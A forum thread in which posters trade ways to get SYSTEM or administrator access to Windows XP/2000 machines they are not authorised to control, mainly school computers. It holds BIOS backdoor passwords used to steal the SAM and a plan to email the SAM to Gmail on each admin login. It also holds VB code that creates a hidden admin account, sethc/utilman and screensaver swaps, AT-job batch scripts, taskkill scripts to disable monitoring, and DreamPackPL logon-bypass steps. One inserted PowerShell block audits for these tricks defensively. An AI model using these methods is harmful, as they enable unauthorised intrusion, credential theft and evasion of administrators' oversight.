Gain SYSTEM/Administrative Access to Windows XP/2000


celltoolz

A bios chip cannot be backdoored or cracked on an oem machine. If it is a custom build machine then there are some backdoor passwords out there, but they rarely work. So that leaves you SOL.

Thanks mate.. gave me an idea. I went to http://www.uktsupport.co.uk/reference/biosp.htm

and found a reasonable list of BD passwords for the Award BIOS.. it seems my target has a cheap MB.. and AWARD_PW worked great.. I have full access now to boot CD / USB and can now go about the simple task of pilfering the SAM :wink:

BTW it was not a matter of the case being locked, but as in most cases the security cameras make it too "James Bond" to open the case without bad consequences.


Oh.. and sorry for multiple posting.. it may in my case be a good idea to insert some code into a file an admin would access on login, which would be able to copy the SAM to an unsecured part of the OS / email it to Gmail whenever the admin logs in, so I don't have to keep accessing the PC via boot disk when the admin routinely changes the PWD.. that would put me 1 step ahead.

Also I believe the domain admin password is different to the local PWD in terms of storage of the hash..

Is the domain PWD stored on the local machine in XP / 2k? How does the stored domain PWD compare to the local PWD in terms of hash? Can these PWDs be broken with normal LM rainbow tables?


Here's a patch code that will add a new username + password (it will ask you for the creds), then it will delete the new admin from the user list so that it is not visible from the fast-switch menu... Then it will open a cmd prompt, not sure what good that will do. I have provided a compiled version of the VB code here: http://www.rrko.com/dev/AddUser.exe

Module HakXP

    Sub Main()

        Console.Write("Enter new username: ")
        Dim uName As String = Console.ReadLine()
        Console.Write("Enter password for " + uName + " : ")
        Dim pWord As String = Console.ReadLine()

        AddUser(uName, pWord)
        RunProcess("C:\WINDOWS\system32", "cmd.exe")   'Will open up a cmd prompt at C:\WINDOWS\system32

    End Sub

    Sub AddUser(ByVal UserName As String, ByVal Password As String)

        Shell("net user " + UserName + " " + Password + " /add")     'Adds the user "UserName" with password "Password"
        Shell("net localgroup administrators " + UserName + " /add") 'Adds "UserName" to the admin group
        Shell("net localgroup users " + UserName + " /delete")       'If Fast-Switching is on, then "UserName" will show up

    End Sub

    Sub RunProcess(ByVal Path As String, ByVal Exe As String)

        Dim px As New Process

        px.StartInfo.WorkingDirectory = Path
        px.StartInfo.FileName = Exe

        px.Start()

    End Sub

End Module

Another possible approach...

If you were to make a new Windows process and create it under the SYSTEM account and set it to automatic, it would automatically start at load, no matter who was logged in. This could be a possible way to retrieve passwords? I'm working on it, have all the code, just need some filler code for the hack.

--ShadowHax


Ok

If you have write access to the registry then this will work:

•Open Regedit
•Go to HKEY_USERS\.DEFAULT\Control Panel\Desktop
•Double click on SCRNSAVE.EXE
•Change logon.scr to cmd.exe
•Change ScreenSaveTimeOut from 600 to 10
•Save and exit the editor and log out
•After 10 seconds, the cmd prompt should appear and will have SYSTEM privileges
•Then do the net user hack
•You're done

You can do some pretty neat things with the SCRNSAVE.EXE variable, e.g. Minesweeper before you log on! :D


Does the replacement of either utilman.exe or services.exe need to be a 16-bit app?

If not, are there any other restrictions on the file? Could I also simply rename a .bat file to utilman.exe?

I tried to replace it with cmd.exe; it seems to be started after pressing [Win]+ but I can't see it?! :(

And BTW: does it also have SYSTEM privileges when started from the Start Menu?


Copy explorer.exe from C:/WINNT/windows

paste to a folder other than C:/WINNT/windows

rename to explorer.scr, right click > install

go to display > screensaver > explorer.scr

restart

have fun

Also an idea would be to download pwdump and make a .bat file to dump the passes to the C:/ dir, cuz that's what will pop up, so you can use the password at that time and login to the admin and unlock your account.

I have done this at my school countless times.

I went into the registry and set it to run every 1 second and well yea, I have a 2 hour class so do the math :)

XD

-m0u53


The only problem with this is that some "locations" (erm, my school) have not only blocked utilman / cmd / service / all other Windows apps from being replaced, but they also locked off the display settings. The one thing they did forget is compmgmt.msc though =) Any suggestions on how I could bypass this, without booting a live distro or floppy?

thx


This should make it work under either XP Home or Pro, and the install directory for XP shouldn't matter anymore..

Here's my update:

Module HakXP

    Sub Main()

        Console.Write("Enter new username: ")
        Dim uName As String = Console.ReadLine()
        Console.Write("Enter password for " + uName + " : ")
        Dim pWord As String = Console.ReadLine()

        AddUser(uName, pWord)
        RunProcess("%systemroot%\system32", "cmd.exe")   'Will open up a cmd prompt at WINDOWS\system32

    End Sub

    Sub AddUser(ByVal UserName As String, ByVal Password As String)

        Shell("net user " + UserName + " " + Password + " /add")     'Adds the user "UserName" with password "Password"
        Shell("net localgroup administrators " + UserName + " /add") 'Adds "UserName" to the admin group
        Shell("net localgroup users " + UserName + " /delete")       'If Fast-Switching is on, then "UserName" will show up

    End Sub

    Sub RunProcess(ByVal Path As String, ByVal Exe As String)

        Dim px As New Process

        px.StartInfo.WorkingDirectory = Path
        px.StartInfo.FileName = Exe

        px.Start()

    End Sub

End Module

%systemroot% is the equivalent of typing C:\Windows or D:\Windows, or whatever drive you installed Windows on..

It also doesn't require admin privs, most of the time.

(I'm not sure if it can be disabled.)

Anyways, I hope that helps somewhat.

I think it may also work for Windows NT now also.. If I remember right, I think the Windows NT root directory is 'C:\WinNT' or something similar. So it should also work..

Could you recompile the code and test it with the new code?

Thankies!

~~Azurith

PS>>

The updated code should make it compatible with NT & XP.

The install drive of Windows should no longer matter.


Very interesting so far :D

I'm working on a solution to put the CMD on the login screen :twisted:

But now that I have admin privileges on the local machine, I'd like to know how to gain those on the domain (like Arikirangi said).

I don't have the possibility of creating a domain here at home, so if anyone has: is pwdump (or any other tool like that) able to read out the domain passwords after you logged into the domain as a "normal" user and start pwdump afterwards?

I assume it'll only read out the local hashes but I think it's worth a try :wink:


I know for sure if you can pull up a command prompt you can edit files.. right?

So what if one was to have XP/Linux/98 on a CD and before a reboot change the boot.ini file to boot off of the CD or flash drive?

Also the autoexec.bat: couldn't this be tampered with, and doesn't this run programs or commands before the XP GUI screen?

If so that could be tampered with as well.

I have a Dell laptop issued by our school. The 1st semester everyone used net user administrator * to change the admin password and gain "root", then near the end of the 1st semester EVERYONE had Halo on their laptops... this pissed off the admins greatly. They took up everyone's laptops and put Novell ZENworks Desktop Management 7 on them, and now if a program isn't launched through Novell then it terminates, no matter what it is; even important programs like updates are denied, and then most recently they fux0r1ng took our entire taskbar... and there is only one way out of it:

Taskkill /IM <processname>

[long story I know but it's true sadly]

<-- brand new school

This fast lil miracle is the only way anyone can run anything.

So what I would do is first create a bat file:

@echo off
tasklist >>Tasks.txt

Then, looking through the tasks, try and point out some key tasks; let's say you find "norton" or something (although I doubt ANY school admin would be retarded enough to run such an evil bl00dsux1ng program). Best bet is to Google it; if it becomes obvious that this program isn't required, kill it as soon as possible.

Then create a bat file containing:

@echo off
TaskKill /IM nortan.exe

If you keep adding to the file then you can make a nice lil bat file that will make you invisible, or well, sorta.

This is good for remote management and other programs they use to monitor your activities, and also when you kill these tasks be sure they are really "dead" by running tasklist again,

as some programs will fight you tooth and nail to the death, or so to speak!


%systemroot%\system32\sethc.exe

Replace it with cmd.exe.

Boot into Windows and press SHIFT five times. A Command Prompt with SYSTEM privileges will pop up (not tested).

---

Download DreamPackPL and replace %systemroot%\System32\sfcfiles.dll with the downloaded one (I'm not sure if it works with Windows XP, I only tested it on my W2K).

---

Download WinlogonHijack and run it from a service or anything else with SYSTEM privileges (I didn't test it yet, but the author claims it to work 100%). It'll log all passwords of logins to a file (but I don't know if it catches network PWs (i.e. domain PWs) too).

--- ---

Now I've got a question:

kickarse posted a link to a nice paper about NT's login. Now, does anybody have a link to a similar paper about W2K, XP or maybe even Vista?

Also I'd like to know if the passwords for domain logins are saved anywhere (cached or just temporarily in memory)? If so, it should be possible to save them somehow. :twisted:

The L0phtcrack crew wrote a utility to catch these passwords in an NT network, it's called something like Blabla SMB... maybe there's a new version available?

Let me know and thanks :D


This is a great idea, I ran into a couple of problems so I thought I would share my solutions. First of all I'd like to say that I am aware most people will not have access to the AT command, but for the few people that may be in a similar situation as me...

My situation: I DO NOT have local admin privileges but I do have higher privileges than standard users. I need access to a system cmd to bypass policy without drawing attention to myself from other students. I am unable to simply replace the file from Windows, and booting from another media is not possible.

Ok, anyone that's in a similar situation to me, here's my solution:

@ECHO off

ECHO @ECHO off>%systemroot%\sethc.bat
ECHO REN %systemroot%\system32\sethc.exe sethc.bak>>%systemroot%\sethc.bat
ECHO COPY %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe>>%systemroot%\sethc.bat
ECHO DEL %systemroot%\sethc.bat /q

SET /a nextmin=(%time:~3,2% + 1)
SET newtime=%time:~0,3%%nextmin%

AT %newtime% /interactive %systemroot%\sethc.bat

Fairly simple code.... VERY simple code... but if anyone wants an explanation let me know. I'm just too lazy to do it right now.

NOTE - I purposely used cmd; I am aware I could just create a local admin account but that is not what I need.

EDIT - Just to clarify, I could just use

SET /a nextmin=(%time:~3,2% + 1)
SET newtime=%time:~0,3%%nextmin%

AT %newtime% /interactive cmd

but I want to be able to close the cmd prompt easily and reopen it when necessary, which is why I chose the longer version.

If you would like the restore file, here it is; I forgot to post it because I don't have a need for it:

@ECHO off
DEL %systemroot%\system32\sethc.exe
REN %systemroot%\system32\sethc.bak sethc.exe

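Added here as a defender's counterpart to the screensaver registry trick, the sethc.exe/utilman.exe swap and the AT job described in the posts above (example code of mine, not from any poster): a PowerShell audit that flags each of them on a host. It assumes PowerShell 2 or later in an elevated shell, and uses the Windows File Protection dllcache folder as its known-good reference, which only exists on 2000/XP/2003 (the check is skipped where the folder is absent).

```powershell
# Added example, not code from this thread. Audits a Windows host for the tricks
# discussed above: System32 binaries swapped for cmd.exe, HKU\.DEFAULT
# SCRNSAVE.EXE repointed, and SYSTEM jobs left behind by AT.
# Assumes PowerShell 2+ (so it also runs on XP/2003) and an elevated shell.

function Get-Sha256([string]$Path) {
    # .NET hashing instead of Get-FileHash, which needs PowerShell 4+
    $sha = [System.Security.Cryptography.SHA256]::Create()
    $fs  = [System.IO.File]::OpenRead($Path)
    try     { ([System.BitConverter]::ToString($sha.ComputeHash($fs))) -replace '-', '' }
    finally { $fs.Close() }
}

$sys32    = Join-Path $env:SystemRoot 'System32'
$dllcache = Join-Path $sys32 'dllcache'   # WFP's pristine copies on 2000/XP/2003
$cmdHash  = Get-Sha256 (Join-Path $sys32 'cmd.exe')

# 1. Files the thread suggests replacing. Identical to cmd.exe, or different from
#    the WFP cache copy, means the file has been swapped.
foreach ($name in 'sethc.exe', 'utilman.exe', 'logon.scr', 'sfcfiles.dll') {
    $path = Join-Path $sys32 $name
    if (-not (Test-Path $path)) { "MISSING  $name"; continue }
    $hash  = Get-Sha256 $path
    $cache = Join-Path $dllcache $name
    if ($hash -eq $cmdHash) {
        "ALERT    $name is a copy of cmd.exe"
    } elseif ((Test-Path $cache) -and $hash -ne (Get-Sha256 $cache)) {
        "ALERT    $name differs from the dllcache copy"
    } else {
        "ok       $name"
    }
}

# 2. Pre-logon screensaver: Windows ships logon.scr here, so anything else
#    (cmd.exe, or any .scr outside System32) is a finding, as is a tiny timeout.
$desk = Get-ItemProperty 'Registry::HKEY_USERS\.DEFAULT\Control Panel\Desktop' -ErrorAction SilentlyContinue
if ($desk) {
    $scr = $desk.'SCRNSAVE.EXE'
    if ($scr -and $scr -notmatch 'logon\.scr$') {
        "ALERT    SCRNSAVE.EXE = $scr (ScreenSaveTimeOut = $($desk.ScreenSaveTimeOut))"
    } else {
        "ok       pre-logon screensaver = $scr"
    }
}

# 3. Jobs queued with AT run as SYSTEM and show up in schtasks as At<n>.
$tasks = schtasks.exe /query /fo csv /v 2>$null | ConvertFrom-Csv
foreach ($t in ($tasks | Where-Object { $_.'Run As User' -match 'SYSTEM' })) {
    "WARN     SYSTEM task '$($t.TaskName)' runs: $($t.'Task To Run')"
}
```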

Well what I do is this. I made a small bat file with this code.

time 12:20:00
at 12:30 /INTERACTIVE cmd.exe /k NET TIME \\bournside4 /SET /YES
time 12:29:58

Spawns an admin shell in 2 seconds, and because my school has a time server I can sync the time back :D But your school won't have one I don't think. So you will need to note the time and reset it manually with the "time" command.

time 12:20:00
at 12:30 /INTERACTIVE cmd.exe /k dir
time 12:29:58

The above code you can use and will work on any computer anywhere.


...Spawns an admin shell in 2 seconds, and because my school has a time server I can sync the time back :D But your school won't have one I don't think. So you will need to note the time and reset it manually with the "time" command...

Actually my school does sync the time, but I also use this in other locations. I did add a line of code to mine but didn't see the need to update my previous post...

TIME = %newtime%

Which will execute immediately, but your idea of changing the time back can be easily implemented if you add these three lines to the end of my code (excluding the line above):

SET proptime=%time%
TIME = %newtime%
TIME = %proptime%

In which case the %newtime% variable/calculation becomes redundant because the time will be changed back anyway and only be a second out, but if that second is worth it to you, you could correct it...


I had an idea the other day.

Assuming you find a locked computer with admin rights.

Is it possible to put one of these executables on a flash drive so when you insert the flash drive it automatically runs the .exe?

1. Not sure if you can launch a process while the computer is locked.

2. Not sure on how the autorun feature will react.

Maybe someone would like to give this a go.


Thought for the first day I may contribute . . . . .

ACCESS ADMINISTRATOR'S ACCOUNT.

1. Get physical access to the machine. Remember that it must have a CD or DVD drive.

2. Download DreamPackPL from the official website or from Rapidshare OR CLICK ON THE LINK (Go here hxxp: www. d--b. webpark. pl/dreampackpl_en. htm).

3. Unzip the downloaded dreampackpl_iso.zip and you'll get dreampackpl.ISO.

4. Use any burning program that can burn ISO images.

5. After you have the disk, boot from the CD or DVD drive. You will see Windows 2000 Setup and it will load some files.

6. Press "R" to install DreamPackPL.

7. Press "C" to install DreamPackPL by using the recovery console.

8. Select the Windows installation that is currently on the computer (normally it is "1" if you only have one Windows installed).

9. Backup your original sfcfiles.dll by typing:

"ren C:\Windows\System32\sfcfiles.dll sfcfiles.lld" (without quotes)

10. Copy the hacked file from the CD to the system32 folder. Type:

"copy D:\i386\pinball.ex_ C:\Windows\System32\sfcfiles.dll" (without quotes and assuming your CD drive is D:)

11. Type "exit", take out the disk and reboot.

12. In the password field, type "dreamon" (without quotes) and the DreamPack menu will appear.

13. Click the top graphic on the DreamPack menu and you will get a menu popup.

14. Go to commands and enable the options and enable the god command.

15. Type "god" in the password field to get into Windows.

You can also go to Passwords and select "Logon with wrong password and hash". This option allows you to login with ANY password.


I mentioned it above 8-)

But does this also work with network login? Anyone tested so far?

It all depends on the intelligence of the system admin. If they are smart the passwords won't be cached, but many system admins are stupid and leave the passwords cached.


Can't you do this easily by booting into safe mode, then opening Control Panel, going to User Accounts, clicking on your account, then on Change Account Type, and changing to system administrator so you can bypass all this stuff? I don't know if it works on other systems, but it works on mine.


Wouldn't that require already having the pass? ;)


I just tried it and it worked, but then again when I went to log on I just clicked on the administrator account and it wasn't password protected, and I couldn't try it on another account because all of them have admin access. You could always give it a try if you want to though.


I know it won't work, well at least not on any of my machines; all my accounts have passwords. This method relies on computers not having an admin password, which everyone should have.
